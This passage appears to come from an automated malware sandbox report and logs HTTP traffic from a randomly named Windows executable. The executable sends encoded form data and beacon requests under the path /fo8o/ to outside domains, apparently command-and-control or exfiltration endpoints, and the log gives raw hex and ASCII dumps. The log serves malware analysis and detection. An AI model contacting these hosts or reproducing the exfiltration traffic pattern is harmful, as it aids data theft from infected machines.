75 7a 74 41 38 6f 49 79 36 5a 78 35 31 51 37 47 6b 34 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 57 45 4f 78 51 32 58 67 70 56 6f 63 78 76 32 57 77 2b 4b 4d 2b 33 71 61 42 6f 69 6c 59 36 74 46 42 74 67 56 56 49 78 73 33 66 6b 30 51 50 58 72 61 68 39 70 4c 53 54 37 41 78 58 65 4c 63 70 74 74 44 61 36 75 65 43 48 54 68 55 66 34 45 37 54 4a 49 36 4a 30 62 65 67 70 76 64 4a 4a 63 4a 44 4d 49 37 66 39 5a 5a 76 70 6c 63 42 74 70 4a 46 6b 4e 52 64 63 54 55 4f 70 38 55 68 79 6f 51 7a 4e 33 75 52 6e 30 36 38 45 37 62 38 54 33 66 57 64 4c 47 39 78 59 67 70 31 6a 61 69 42 34 51 70 56 57 68 77 57 63 67 65 6b 32 42 50 4f 50 38 56 70 51 45 73 6d 70 2f 61 44 6f 5a 51 54 6e 72 70 35 34 48 70 2f 4d 7a 30 38 64 43 6e 56 70 56 7a 33 55 48 7a 6d 65 76 38 39 41 75 47 39 43 6d 4e 2b 64 62 72 6c 56 55 74 36 4c 51 51 59 36 73 33 50 38 6d 30 66 72 57 54 58 66 6b 4c 54 70 63 51 56 70 43 70 76 43 30 53 2f 43 2b 4b 73 71 34 38 56 4d 6c 76 68 47 68 44 35 36 7a 69 6e 76 66 78 68 6b 43 59 54 70 56 51 7a 69 73 54 7a 69 69 35 49 74 41 61 41 57 7a 75 37 78 32 70 44 30 41 62 4c 56 59 4e 34 52 5a 4a 6f 34 30 4e 34 6f 66 74 41 43 74 74 6c 4d 54 54 62 4b 2f 74 6b 62 64 75 49 4e 77 44 72 4b 43 35 47 42 31 45 6c 32 71 45 34 4b 70 55 39 35 4f 49 66 6d 34 75 71 5a 47 74 32 70 4f 75 37 37 46 30 72 69 6f 4d 50 2b 4c 4f 34 33 6f 53 68 6a 72 4a 79 30 32 47 35 50 71 42 5a 68 52 53 4c 46 4c 67 39 4a 42 68 61 31 4a 6c 52 39 38 74 6a 2f 59 50 67 39 6e 59 43 48 61 59 70 5a 63 73 65 34 76 5a 51 51 75 68 61 2b 66 55 74 48 76 44 74 73 44 6b 6b 41 62 61 69 64 35 6f 74 56 48 45 59 78 47 4f 68 50 44 2f 36 4f 77 67 78 57 50 75 58 33 79 79 78 65 6b 34 55 44 68 74 75 6d 4b 76 62 76 74 59 43 35 35 32 5a 4c 46 59 4b 53 73 7a 69 4a 4c 55 33 6f 55 64 55 75 47 73 7a 41 74 30 74 6b 57 46 77 41 70 54 49 4a 2b 63 48 67 4e 53 71 7a 52 76 36 6d 4c 2b 54 48 38 56 41 66 42 41 6b 58 50 51 6e 43 67 79 76 63 38 31 68 78 54 35 73 64 68 38 54 6b 59 51 6d 36 42 43 41 57 41 56 47 41 61 56 54 6b 75 45 44 2b 4c 66 47 6c 47 71 61 4d 6e 59 6d 67 43 36 43 5a 5a 4d 52 49 42 77 2b 47 7a 6c 70 6b 56 65 53 71 35 70 64 4e 69 4f 43 72 61 59 63 6e 6f 32 59 57 2b 39 72 74 42 4f 47 73 51 41 71 4b 33 39 45 2f 64 38 4a 33 63 62 30 48 6e 35 53 67 4c 4b 34 57 78 72 4f 77 5a 7a 75 2b 75 47 54 48 4a 64 44 6b 4e 52 55 78 73 52 49 58 38 41 56 45 61 35 59 62 52 6f 66 33 77 31 4b 52 37 4e 36 54 4f 56 49 79 6c 54 78 57 79 43 78 34 44 56 44 57 2f 4e 73 76 4d 59 6a 70 64 68 4c 70 68 6a 6e 41 44 6f 4b 5a 67 4c 6d 6b 61 6f 75 69 71 64 38 56 2b 63 77 48 32 4f 6a 6e 4f 73 2b 73 32 52 64 43 6c 71 66 58 37 63 54 57 33 77 2f 37 2b 6d 63 66 77 4f 57 6b 6b 57 34 38 4a 32 52 2f 61 73 4e 53 57 44 7a 67 79 4c 64 6e 31 36 36 70 41 4c 6b 37 57 4a 2f 55 49 45 42 4d 78 53 4d 7a 7a 75 74 38 38 46 39 4c 70 2f 6a 68 45 54 73 47 69 30 74 7a 37 62 55 6b 74 74 75 2f 4a 30 38 36 30 57 47 2f 39 69 4d 58 34 75 38 2f 65 74 32 51 74 56 49 39 47 58 71 63 4a 79 72 30 78 4d 50 4b 79 77 63 49 32 37 62 37 6b 4b 6e 58 48 68 6b 6d 52 74 55 42 4c 62 4a 65 37 69 4a 34 49 71 4e 68 75 79 53 47 38 6c 4c 48 31 33 78 62 62 41 6a 6a 4c 33 69 39 48 34 3d Data Ascii: bD=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xLxxZRBnnOm80ZPuFW25W83c/uztA8oIy6Zx51Q7Gk4SYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuWEOxQ2XgpVocxv2Ww+KM+3qaBoilY6tFBtgVVIxs3fk0QPXrah9pLST7AxXeLcpttDa6ueCHThUf4E7TJI6J0begpvdJJcJDMI7f9ZZvplcBtpJFkNRdcTUOp8UhyoQzN3uRn068E7b8T3fWdLG9xYgp1jaiB4QpVWhwWcgek2BPOP8VpQEsmp/aDoZQTnrp54Hp/Mz08dCnVpVz3UHzmev89AuG9CmN+dbrlVUt6LQQY6s3P8m0frWTXfkLTpcQVpCpvC0S/C+Ksq48VMlvhGhD56zinvfxhkCYTpVQzisTzii5ItAaAWzu7x2pD0AbLVYN4RZJo40N4oftACttlMTTbK/tkbduINwDrKC5GB1El2qE4KpU95OIfm4uqZGt2pOu77F0rioMP+LO43oShjrJy02G5PqBZhRSLFLg9JBha1JlR98tj/YPg9nYCHaYpZcse4vZQQuha+fUtHvDtsDkkAbaid5otVHEYxGOhPD/6OwgxWPuX3yyxek4UDhtumKvbvtYC552ZLFYKSsziJLU3oUdUuGszAt0tkWFwApTIJ+cHgNSqzRv6mL+TH8VAfBAkXPQnCgyvc81hxT5sdh8TkYQm6BCAWAVGAaVTkuED+LfGlGqaMnYmgC6CZZMRIBw+GzlpkVeSq5pdNiOCraYcno2YW+9rtBOGsQAqK39E/d8J3cb0Hn5SgLK4WxrOwZzu+uGTHJdDkNRUxsRIX8AVEa5YbRof3w1KR7N6TOVIylTxWyCx4DVDW/NsvMYjpdhLphjnADoKZgLmkaouiqd8V+cwH2OjnOs+s2RdClqfX7cTW3w/7+mcfwOWkkW48J2R/asNSWDzgyLdn166pALk7WJ/UIEBMxSMzzut88F9Lp/jhETsGi0tz7bUkttu/J0860WG/9iMX4u8/et2QtVI9GXqcJyr0xMPKywcI27b7kKnXHhkmRtUBLbJe7iJ4IqNhuySG8lLH13xbbAjjL3i9H4=
Apr 19, 2024 03:29:08.040141106 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Fri, 19 Apr 2024 01:29:07 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49728	116.50.37.244	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:10.577805996 CEST	521	OUT	GET /fo8o/?VVq=lF_H&bD=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 19, 2024 03:29:10.871731043 CEST	901	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/?VVq=lF_H&bD=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Fri, 19 Apr 2024 01:29:10 GMT Connection: close Content-Length: 309 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 3f 56 56 71 3d 6c 46 5f 48 26 61 6d 70 3b 62 44 3d 4c 46 4b 71 79 72 63 75 37 67 31 4e 43 61 38 63 56 31 72 32 74 4e 6b 6f 68 72 6f 64 75 54 36 70 72 49 4d 4c 74 61 57 67 4b 4a 39 62 42 4b 51 72 34 64 73 6e 79 4d 50 46 70 4d 51 6a 4a 4c 47 52 37 69 65 79 78 75 70 4f 53 70 76 31 48 62 66 55 61 4d 61 46 78 67 73 7a 6b 67 49 73 69 38 77 66 61 36 2f 43 50 71 6b 65 58 31 6b 4d 45 39 44 6a 49 32 54 76 6f 75 4f 36 35 4f 76 4b 6b 36 4e 6c 38 4f 45 76 51 2f 38 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/?VVq=lF_H&bD=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49729	46.30.213.191	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:16.413825989 CEST	799	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 6b 52 35 38 65 32 62 58 69 70 4f 6a 51 67 39 6e 58 49 5a 50 54 73 6a 6b 6e 6c 36 6b 56 4e 59 54 70 6e 41 61 59 37 75 74 36 56 71 57 44 58 49 4f 36 55 6f 74 53 70 6f 38 4f 56 2f 4e 4e 5a 53 39 32 39 6e 4c 43 63 50 43 44 48 4a 65 37 35 51 32 66 46 4f 70 35 50 7a 68 78 53 4f 58 48 69 4e 78 6d 7a 61 6d 6d 45 2f 4a 74 73 59 39 32 6c 49 62 39 6e 41 55 2b 67 6e 51 41 4b 75 6e 65 53 4e 74 6e 30 74 57 37 64 63 49 2f 48 79 63 76 4b 62 52 33 31 30 4f 6e 68 4a 69 6a 43 47 38 4c 6f 4d 33 48 36 62 50 47 72 41 6e 64 56 48 69 4e 7a 7a 49 72 37 43 74 30 2b 76 58 4f 4a 73 55 63 48 34 70 Data Ascii: bD=CRNZjizTKDTdkR58e2bXipOjQg9nXIZPTsjknl6kVNYTpnAaY7ut6VqWDXIO6UotSpo8OV/NNZS929nLCcPCDHJe75Q2fFOp5PzhxSOXHiNxmzammE/JtsY92lIb9nAU+gnQAKuneSNtn0tW7dcI/HycvKbR310OnhJijCG8LoM3H6bPGrAndVHiNzzIr7Ct0+vXOJsUcH4p
Apr 19, 2024 03:29:16.612190008 CEST	559	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Fri, 19 Apr 2024 01:39:16 GMT Last-Modified: Fri, 19 Apr 2024 01:29:16 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Fri, 19 Apr 2024 01:29:16 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 506055850 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49730	46.30.213.191	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:19.143745899 CEST	823	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 4d 54 6f 46 49 61 62 35 47 74 2f 56 71 57 4c 33 49 50 33 30 6f 6b 53 70 6c 44 4f 55 44 4e 4e 5a 47 39 32 35 76 4c 43 76 33 4e 42 58 4a 51 77 5a 51 34 62 46 4f 70 35 50 7a 68 78 53 61 78 48 69 6c 78 6d 67 43 6d 6e 6c 2f 4b 7a 38 59 2b 78 6c 49 62 77 48 41 59 2b 67 6d 7a 41 4c 7a 38 65 55 52 74 6e 77 70 57 38 4d 63 4a 71 33 7a 58 78 36 61 42 36 46 46 79 35 43 45 64 74 68 2b 4f 61 4b 67 4f 43 4d 61 56 61 59 41 45 50 46 6e 67 4e 78 72 36 72 62 43 48 32 2b 58 58 63 65 67 7a 54 7a 64 4b 37 59 57 78 57 2b 42 45 70 4f 51 6a 49 54 4a 69 68 69 56 67 4b 67 3d 3d Data Ascii: bD=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/MToFIab5Gt/VqWL3IP30okSplDOUDNNZG925vLCv3NBXJQwZQ4bFOp5PzhxSaxHilxmgCmnl/Kz8Y+xlIbwHAY+gmzALz8eURtnwpW8McJq3zXx6aB6FFy5CEdth+OaKgOCMaVaYAEPFngNxr6rbCH2+XXcegzTzdK7YWxW+BEpOQjITJihiVgKg==
Apr 19, 2024 03:29:19.341626883 CEST	559	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Fri, 19 Apr 2024 01:39:19 GMT Last-Modified: Fri, 19 Apr 2024 01:29:19 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Fri, 19 Apr 2024 01:29:19 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 583934760 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49733	46.30.213.191	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:21.879568100 CEST	1836	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 30 54 70 77 45 61 62 65 79 74 34 56 71 57 42 58 49 43 33 30 70 32 53 70 73 4b 4f 55 50 64 4e 63 43 39 30 65 76 4c 45 65 33 4e 62 48 4a 51 2f 35 51 31 66 46 4f 77 35 4c 66 6c 78 53 4b 78 48 69 6c 78 6d 6d 47 6d 67 30 2f 4b 30 4d 59 39 32 6c 49 66 39 6e 42 78 2b 67 2f 49 41 4c 6e 73 65 43 68 74 6d 55 4e 57 35 36 49 4a 32 6e 7a 56 77 36 62 45 36 46 4a 58 35 43 5a 6d 74 67 4b 6f 61 4a 38 4f 43 72 6e 36 4a 70 34 44 65 32 6d 59 54 54 54 4d 73 4f 47 74 75 75 4c 74 4b 4e 5a 44 53 77 56 2b 30 2f 65 72 54 39 4a 47 6a 4d 38 63 47 33 55 38 73 54 51 48 61 33 67 6d 74 35 30 6f 35 74 63 35 55 70 51 39 55 74 35 61 33 37 58 63 58 4b 44 6f 44 31 6a 68 33 36 64 51 49 4e 76 67 4a 31 68 62 43 72 54 4f 6d 38 30 32 49 52 78 34 6d 51 30 46 68 61 34 42 68 38 69 67 4d 61 6d 31 58 72 33 54 66 46 35 4b 67 46 71 61 2b 41 6a 46 51 48 56 6b 75 32 6d 38 74 32 6c 4b 39 34 50 31 2b 6a 2f 78 51 6c 4d 72 50 71 31 68 7a 59 68 34 5a 6a 41 6e 48 47 54 4b 33 4f 73 50 55 49 6d 4a 59 57 62 38 7a 44 61 56 72 31 70 4a 71 61 34 45 33 6b 59 59 6a 7a 39 44 36 47 41 70 2f 69 56 46 56 59 52 62 49 64 58 61 34 50 4f 6e 72 78 6d 6f 74 4c 47 39 57 41 59 31 32 78 72 6c 2f 72 73 75 47 61 6b 54 4f 57 72 52 4a 33 62 39 4f 4a 33 4c 35 70 2f 34 65 57 57 72 57 6a 56 4f 2f 65 38 79 2f 61 4a 63 6a 33 72 6a 56 2f 44 77 67 74 55 64 48 46 6a 6c 7a 76 5a 62 6a 50 57 6c 4a 63 75 55 65 79 55 64 32 78 43 6d 64 38 42 73 77 51 6d 36 59 2b 61 2f 68 57 39 37 61 4a 41 78 55 41 33 5a 73 47 6a 69 73 52 78 37 73 6b 6e 4b 30 73 6d 66 41 39 6f 58 46 6c 34 32 30 79 68 51 53 73 30 73 32 36 4d 4d 38 64 50 46 6a 36 38 74 67 52 2b 6e 45 56 58 6a 75 68 58 67 43 38 2f 32 50 30 33 72 44 6c 34 39 59 68 48 38 41 49 69 68 70 70 63 6b 55 4f 34 4e 71 63 46 44 66 39 45 51 5a 38 6b 52 35 65 4d 4c 35 33 56 71 30 55 39 47 50 4d 71 39 51 6b 42 73 78 65 62 4b 63 45 56 31 64 35 6c 2b 4c 50 35 58 6a 76 5a 42 70 5a 64 56 30 69 65 37 59 69 46 70 31 70 79 6c 72 4a 45 6c 32 48 43 71 39 77 64 77 57 78 67 74 79 43 6c 68 4e 4c 45 6e 72 4f 4f 34 4c 32 32 6e 43 6f 75 76 6e 76 6a 6d 7a 72 30 76 53 2b 69 44 43 4e 4e 5a 48 55 78 75 57 66 4d 6a 55 62 51 54 34 77 6e 5a 5a 6e 76 6d 6e 4e 4d 53 61 78 50 49 66 2f 68 4a 4e 42 71 69 53 67 44 4e 30 77 70 63 4c 44 2b 4f 53 65 67 55 4c 41 47 66 64 34 52 68 42 67 44 30 54 42 4a 44 45 39 7a 64 58 4b 54 77 68 48 43 61 39 4e 53 4c 79 4d 72 33 61 57 79 69 35 70 37 33 4f 79 47 79 46 78 31 4a 74 34 49 47 44 77 6e 62 54 4b 65 7a 47 54 51 66 72 63 62 30 67 34 7a 2b 50 4d 37 50 69 67 70 67 35 31 6b 6f 78 62 71 49 32 68 43 4f 33 6f 64 4a 73 67 4c 47 6c 51 6b 4b 57 42 41 42 42 44 56 57 74 2b 35 6c 6f 6b 51 47 63 67 79 32 6b 75 2b 70 6b 77 69 71 6a 53 4d 4c 63 48 67 30 65 4b 72 6e 77 70 59 6c 68 32 68 63 6e 6c 37 74 78 62 59 44 79 79 63 64 72 33 30 56 65 4d 6f 5a 7a 4e 78 55 56 67 50 4c 68 6f 43 6a 78 72 32 41 55 64 34 44 6a 39 6e 54 46 73 37 68 73 5a 51 31 47 7a 56 76 62 33 44 7a 79 6b 30 67 50 68 43 71 68 4b 38 41 71 42 4a 30 4f 6b 37 32 74 31 56 73 6b 64 46 30 47 39 69 78 74 7a 63 52 38 57 48 64 49 51 55 67 2b 61 66 52 76 72 48 62 65 54 69 7a 79 34 68 53 73 67 62 62 49 76 43 33 74 37 6d 67 61 75 56 6d 34 31 41 79 7a 6d 78 51 44 72 47 79 4d 65 70 54 36 79 36 59 47 74 41 33 64 4f 67 71 64 76 65 6b 74 4f 57 55 70 39 59 63 4e 2b 51 64 71 48 36 68 33 4e 4c 49 36 64 46 50 49 62 4b 49 58 74 4b 6e 71 4e 44 6b 6c 72 6b 59 53 53 6d 52 71 79 6e 59 6c 73 4d 57 73 4e 50 5a 2f 46 46 63 61 63 2b 62 4e 78 74 33 73 4d 6d 4e 45 75 68 39 56 4a 74 38 78 59 74 47 6a 51 32 54 36 4f 70 63 44 65 32 39 39 58 64 44 44 55 43 71 48 42 39 32 5a 45 43 59 46 55 4c 6d 35 72 57 39 72 50 58 49 74 47 46 39 75 59 6a 50 53 47 51 46 71 6b 30 3d Data Ascii: bD=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/0TpwEabeyt4VqWBXIC30p2SpsKOUPdNcC90evLEe3NbHJQ/5Q1fFOw5LflxSKxHilxmmGmg0/K0MY92lIf9nBx+g/IALnseChtmUNW56IJ2nzVw6bE6FJX5CZmtgKoaJ8OCrn6Jp4De2mYTTTMsOGtuuLtKNZDSwV+0/erT9JGjM8cG3U8sTQHa3gmt50o5tc5UpQ9Ut5a37XcXKDoD1jh36dQINvgJ1hbCrTOm802IRx4mQ0Fha4Bh8igMam1Xr3TfF5KgFqa+AjFQHVku2m8t2lK94P1+j/xQlMrPq1hzYh4ZjAnHGTK3OsPUImJYWb8zDaVr1pJqa4E3kYYjz9D6GAp/iVFVYRbIdXa4POnrxmotLG9WAY12xrl/rsuGakTOWrRJ3b9OJ3L5p/4eWWrWjVO/e8y/aJcj3rjV/DwgtUdHFjlzvZbjPWlJcuUeyUd2xCmd8BswQm6Y+a/hW97aJAxUA3ZsGjisRx7sknK0smfA9oXFl420yhQSs0s26MM8dPFj68tgR+nEVXjuhXgC8/2P03rDl49YhH8AIihppckUO4NqcFDf9EQZ8kR5eML53Vq0U9GPMq9QkBsxebKcEV1d5l+LP5XjvZBpZdV0ie7YiFp1pylrJEl2HCq9wdwWxgtyClhNLEnrOO4L22nCouvnvjmzr0vS+iDCNNZHUxuWfMjUbQT4wnZZnvmnNMSaxPIf/hJNBqiSgDN0wpcLD+OSegULAGfd4RhBgD0TBJDE9zdXKTwhHCa9NSLyMr3aWyi5p73OyGyFx1Jt4IGDwnbTKezGTQfrcb0g4z+PM7Pigpg51koxbqI2hCO3odJsgLGlQkKWBABBDVWt+5lokQGcgy2ku+pkwiqjSMLcHg0eKrnwpYlh2hcnl7txbYDyycdr30VeMoZzNxUVgPLhoCjxr2AUd4Dj9nTFs7hsZQ1GzVvb3Dzyk0gPhCqhK8AqBJ0Ok72t1VskdF0G9ixtzcR8WHdIQUg+afRvrHbeTizy4hSsgbbIvC3t7mgauVm41AyzmxQDrGyMepT6y6YGtA3dOgqdvektOWUp9YcN+QdqH6h3NLI6dFPIbKIXtKnqNDklrkYSSmRqynYlsMWsNPZ/FFcac+bNxt3sMmNEuh9VJt8xYtGjQ2T6OpcDe299XdDDUCqHB92ZECYFULm5rW9rPXItGF9uYjPSGQFqk0=
Apr 19, 2024 03:29:22.077750921 CEST	559	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Fri, 19 Apr 2024 01:39:21 GMT Last-Modified: Fri, 19 Apr 2024 01:29:21 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Fri, 19 Apr 2024 01:29:21 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 652050800 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 